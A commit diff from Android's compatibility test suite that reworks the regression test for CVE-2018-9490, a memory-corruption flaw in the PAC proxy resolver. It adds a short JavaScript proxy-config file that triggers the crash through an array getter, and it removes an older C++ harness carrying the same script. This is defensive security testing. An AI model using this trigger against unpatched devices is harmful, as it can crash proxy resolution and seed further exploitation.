Update and fix test for Android Security CVE-2018-9490
Test: cts-tradefed run cts -m CtsSecurityBulletinHostTestCases -t android.security.cts.Poc18_10#testPocCVE_2018_9490
Bug: 111274046
Change-Id: Id5ee2aaa142d87b452a84d45f43a640f8e44aa4e
Merged-In: Id5ee2aaa142d87b452a84d45f43a640f8e44aa4e
diff --git a/hostsidetests/securitybulletin/AndroidTest.xml b/hostsidetests/securitybulletin/AndroidTest.xml
index 5fbfbd5..d1551d0 100644
--- a/hostsidetests/securitybulletin/AndroidTest.xml
+++ b/hostsidetests/securitybulletin/AndroidTest.xml
@@ -181,7 +181,6 @@
<!--__________________-->
<!-- Bulletin 2018-10 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
- <option name="push" value="CVE-2018-9490->/data/local/tmp/CVE-2018-9490" />
<option name="push" value="CVE-2018-9515->/data/local/tmp/CVE-2018-9515" />
<!--__________________-->
diff --git a/hostsidetests/securitybulletin/res/CVE-2018-9490.pac b/hostsidetests/securitybulletin/res/CVE-2018-9490.pac
new file mode 100644
index 0000000..9fb7ba8
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/CVE-2018-9490.pac
@@ -0,0 +1,15 @@
+function FindProxyForURL(url, host){
+ alert("enter");
+ let arr = [];
+ arr[1000] = 0x1234;
+
+ arr.__defineGetter__(256, function () {
+ delete arr[256];
+ arr.unshift(1.1);
+ arr.length = 0;
+ });
+
+ Object.entries(arr).toString();
+ alert(JSON.stringify(entries));
+ return 0;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9490/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9490/Android.mk
deleted file mode 100644
index a6a520f..0000000
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9490/Android.mk
+++ /dev/null
@@ -1,34 +0,0 @@
-# Copyright (C) 2018 The Android Open Source Project
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-
-LOCAL_PATH := $(call my-dir)
-
-include $(CLEAR_VARS)
-LOCAL_MODULE := CVE-2018-9490
-LOCAL_SRC_FILES := poc.cpp
-LOCAL_MULTILIB := both
-LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
-LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
-
-LOCAL_SHARED_LIBRARIES := \
- libpac \
-
-# Tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts sts vts
-LOCAL_CTS_TEST_PACKAGE := android.security.cts
-
-LOCAL_ARM_MODE := arm
-LOCAL_CPPFLAGS = -Wall -Werror
-
-include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9490/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9490/poc.cpp
deleted file mode 100644
index c6d332a..0000000
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9490/poc.cpp
+++ /dev/null
@@ -1,52 +0,0 @@
-/*
- * Copyright (C) 2018 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-
-#ifndef _GNU_SOURCE
-#define _GNU_SOURCE
-#endif
-#include <sys/types.h>
-#include <sys/wait.h>
-#include <memory>
-#include <proxy_resolver_v8_wrapper.h>
-
-#define URL u""
-#define HOST u""
-#define SCRIPT \
- u"function FindProxyForURL(url, host){\n" \
- " alert(\"enter\");\n" \
- " let arr = [];\n" \
- " arr[1000] = 0x1234;\n" \
- "\n" \
- " arr.__defineGetter__(256, function () {\n" \
- " delete arr[256];\n" \
- " arr.unshift(1.1);\n" \
- " arr.length = 0;\n" \
- " });\n" \
- "\n" \
- " Object.entries(arr).toString();\n" \
- " alert(JSON.stringify(entries));\n" \
- "\n" \
- " return 0;\n" \
- "}\n"
-
-int main(void) {
- auto resolver = std::unique_ptr<ProxyResolverV8Handle, void(*)(ProxyResolverV8Handle*)>(
- ProxyResolverV8Handle_new(), ProxyResolverV8Handle_delete);
- ProxyResolverV8Handle_SetPacScript(resolver.get(), SCRIPT);
- auto results = std::unique_ptr<char16_t, decltype(&free)>(ProxyResolverV8Handle_GetProxyForURL(
- resolver.get(), URL, HOST), &free);
- return 0;
-}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_10.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_10.java
index 0423b37..dfc3de0 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_10.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_10.java
@@ -42,7 +42,7 @@
*/
@SecurityTest
public void testPocCVE_2018_9490() throws Exception {
- int code = AdbUtils.runPocGetExitStatus("/data/local/tmp/CVE-2018-9490", getDevice(), 60);
+ int code = AdbUtils.runProxyAutoConfig("CVE-2018-9490", getDevice());
assertTrue(code != 139); // 128 + signal 11
}
}